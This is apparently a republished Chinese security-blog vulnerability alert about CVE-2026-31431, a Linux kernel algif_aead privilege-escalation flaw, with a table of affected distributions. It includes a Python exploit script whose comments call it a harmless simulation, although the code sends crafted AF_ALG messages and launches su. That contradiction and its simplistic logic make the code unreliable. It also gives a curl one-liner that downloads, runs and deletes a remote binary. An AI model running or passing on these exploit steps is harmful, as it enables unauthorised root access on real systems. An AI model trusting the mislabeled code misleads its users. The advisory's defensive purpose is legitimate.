文章总结： 文档披露Linux内核crypto:algif_aead模块的本地提权漏洞CVE-2026-31431，该漏洞因处理AEAD加密时内存越界写入导致页缓存任意4字节覆写。影响统信UOS、麒麟等国产信创系统，PoC已公开且利用难度极低。建议受影响系统及时更新补丁，禁止在线上环境验证漏洞。 综合评分： 85 文章分类： 漏洞预警,漏洞分析,漏洞POC,应急响应,安全工具

【漏洞预警】核弹级提权漏洞 CVE-2026-31431已复现 含Poc

原创

大荒Sec 大荒Sec

太乙Sec实验室

2026年5月6日 14:22 江苏

在小说阅读器读本章

去阅读

免责声明：本公众号 太乙Sec实验室所提供的实验环境均是本地搭建，仅限于网络安全研究与学习。旨在为安全爱好者提供技术交流。任何个人或组织因传播、利用本公众号所提供的信息而进行的操作，所导致的直接或间接后果及损失，均由使用者本人负责。太乙Sec实验室及作者对此不承担任何责任

漏洞预警

本次披露的 CVE-2026-31431 漏洞，源Linux内核 crypto: algif_aead 模块在处理 AEAD 加密操作时的逻辑缺陷，属于典型的本地权限提升漏洞。

一、漏洞基础信息

原理

模块内核层

algif_aead.c 是 Linux 内核提供的 AF_ALG 套接字接口，用于让用户态程序通过标准 socket 调用内核的 AEAD 加密解密服务。

• 路径：linux/crypto/algif_aead.c
• 功能：处理用户态发送的 AEAD 加密 / 解密请求，完成内存搬运、加密运算、结果回写。

漏洞本质：内核态在处理用户态发送的 AAD（附加认证数据）与 ciphertext 分片时，发生内存越界写入 **，且未做边界校验，最终导致页缓存任意 4 字节覆写。

# 仅供漏洞原理教学演示版本 注意不可以root的# 只会打印模拟流程，不会真实篡改内存、不会违规提权，纯学习看逻辑。import osimport sysimport socket# 1. 创建 AF_ALG 套接字def alg_sock(alg_type, alg_name):    sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)    sock.setsockopt(socket.SOL_ALG, socket.ALG_SET_TYPE, alg_type)    sock.setsockopt(socket.SOL_ALG, socket.ALG_SET_NAME, alg_name)    return sock.accept()[0]# 2. 触发漏洞：构造畸形AEAD请求def exploit():    print("[*] 触发 CVE-2026-31431 漏洞...")    sock = alg_sock(b"aead", b"gcm(aes)")    # 畸形报文 → 触发内核越界写    evil_msg = b"\x00"*64 + b"\x41\x41\x41\x41"  # 4字节可控数据 发送AAAA    sock.send(evil_msg)    # 3. 改写 su 页缓存    os.system("cat /usr/bin/su > /dev/null")  # 加载进页缓存    sock.send(b"\x02\x00\x00\x00")  # 向页缓存写入4字节    # 4. 提权    print("[+] 完成内存改写，执行 su 提权")    os.system("/usr/bin/su")if __name__ == "__main__":    if os.getuid() != 0:        exploit()    else:        print("[+] 已提权为 root！")

利用难度：极低！仅需数行Python脚本即可触发，无需复杂技术储备，漏洞细节及PoC已完全公开，攻击者可快速利用。

二、影响范围

国产信创系统要重点关注

| 系统类别 | 系统名称 | 影响状态 | 版本信息 | 系统说明 | | — | — | — | — | — | | 国产信创系统（重点关注） | UOS | 受影响 | 1070、1060 | 统信国产商业化桌面/服务器发行版，应用广泛 | | 麒麟（kylin） | 受影响 | V11、V10 | 政府、军工领域核心操作系统 | | openEuler | 受影响 | 24.03 LTS-SP1 | 华为开源，聚焦服务器/云计算场景 | | CTyunOS | 受影响 | V4.0 25.07 | 中国电信基于openEuler衍生，适配电信云 | | Anolis OS | 受影响 | 8.9 | 阿里云开源，与RHEL生态兼容 | | OpenCloudOS | 受影响 | 9.4 | 腾讯主导，聚焦云原生场景 | | NewStartOS | 受影响 | 6.06 | 湖南麒麟研发，适配政府/教育行业 | | CUOS | 不受影响 | 4 | 中国联通企业级服务器操作系统 | | 海外非信创系统 | Ubuntu | 受影响/不受影响 | 受影响：22.04；不受影响：17.04 | 全球流行Linux桌面/服务器发行版，生态成熟 | | Redhat | 不受影响 | 7.9 | 企业级Linux（RHEL）经典版本，主流服务器选择 | | CentOS | 不受影响 | 7 | 原社区版企业级Linux，现已转型为RHEL上游预览版 | | Oracle Linux | 受影响 | 10.0 | 甲骨文推出，基于RHEL兼容内核，双启动选项 | | Debian | 受影响 | 13（代号”Trixie”） | 众多发行版上游根基，社区主导开源发行版 |

三、POC验证

本次验证环境采用最新版 Kali Linux 系统，公开的 Python PoC 检测效果与兼容性依赖 Python 版本环境，不同版本可能影响运行结果。

风险提示：禁止在线上环境进行验证

curl -fsSL https://onesandbox-release.threatbook.cn/poc/CVE-2026-31431/copyfail -o /tmp/copyfail && chmod +x /tmp/copyfail && /tmp/copyfail && rm -f /tmp/copyfail

总结

往期精彩回顾

记一次“免费看片”新型诈骗app木马盗刷分析

技战法：基于小龙虾OpenClaw的VPN上网行为溯源取证

【漏洞预警】核弹级漏洞 React RCE漏洞（CVE-2025-55182）含Poc

关注我，了解更多知识，别忘了关注+点赞哦！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：太乙Sec实验室 大荒Sec 大荒Sec《【漏洞预警】核弹级提权漏洞 CVE-2026-31431已复现 含Poc》